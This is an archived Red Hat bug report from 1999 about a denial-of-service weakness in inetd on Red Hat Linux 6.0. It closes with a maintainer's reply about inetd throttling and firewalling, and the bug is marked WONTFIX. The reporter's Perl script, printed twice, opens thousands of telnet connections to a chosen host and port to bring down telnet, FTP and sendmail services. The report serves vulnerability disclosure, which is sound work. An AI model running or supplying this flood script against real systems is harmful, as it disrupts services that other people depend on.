Bug 4005
| Summary: | inetd D-O-S exploit | ||
|---|---|---|---|
| Product: | [Retired] Red Hat Linux | Reporter: | jjuarez |
| Component: | netkit-base | Assignee: | Cristian Gafton <gafton> |
| Status: | CLOSED WONTFIX | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | 6.0 | CC: | jjuarez |
| Target Milestone: | --- | ||
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 1999-07-28 07:53:42 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
*** Bug 4004 has been marked as a duplicate of this bug. *** #!/usr/bin/perl # Author: Jesus A. Juarez # Jul 1999 # e-mail: chuby # The Xploit attack to services under inetd daemon on the # Linux Box's, this cause the suspend of the services. # The problem is on the inetd, telnet, ftp & sendmail, etc; # daemon's, because this programs do not limit the number of # calls by client. This causes that the service requested # became down. # Use it under your own risk. # The TCP-WRAPPERS don't Fix this problem. # Sintax: # DoS-TFS.pl <hostname> <port> <enter> # DoS-Telnet, FTP, Sendmail, etc. # This code has beed tested from Linux to Linux Box's whith # Perl installed, I think' that it run the same way on # some Unix's or Windows System to damage some Linux Box's. use Net::Telnet; for ($i=0;$i<5000;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port > "$ARGV[1]"); my $cmd = "."; $obj->print("$cmd"); $obj->close; } #this problem will not be published. # please notify me, when fix it. :) inetd will shut down the services that are being over-used or come under heavy network activity. One can use the wait/nowait.N to limit the number of spawns for that service to N per second, but that is not a effective protection against these types of attacks. The kernel SYn cookies will also help here, but the only effective way of protection is firewalling off the attacker. |
#!/usr/bin/perl # Author: Jesus A. Juarez # Jul 1999 # e-mail: chuby # The Xploit attack to services under inetd daemon on the # Linux Box's, this cause the suspend of the services. # The problem is on the inetd, telnet, ftp & sendmail, etc; # daemon's, because this programs do not limit the number of # calls by client. This causes that the service requested # became down. # Use it under your own risk. # The TCP-WRAPPERS don't Fix this problem. # Sintax: # DoS-TFS.pl <hostname> <port> <enter> # DoS-Telnet, FTP, Sendmail, etc. # This code has beed tested from Linux to Linux Box's whith # Perl installed, I think' that it run the same way on # some Unix's or Windows System to damage some Linux Box's. use Net::Telnet; for ($i=0;$i<5000;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port > "$ARGV[1]"); my $cmd = "."; $obj->print("$cmd"); $obj->close; } #this problem will not be published. # please notify me, when fix it. :)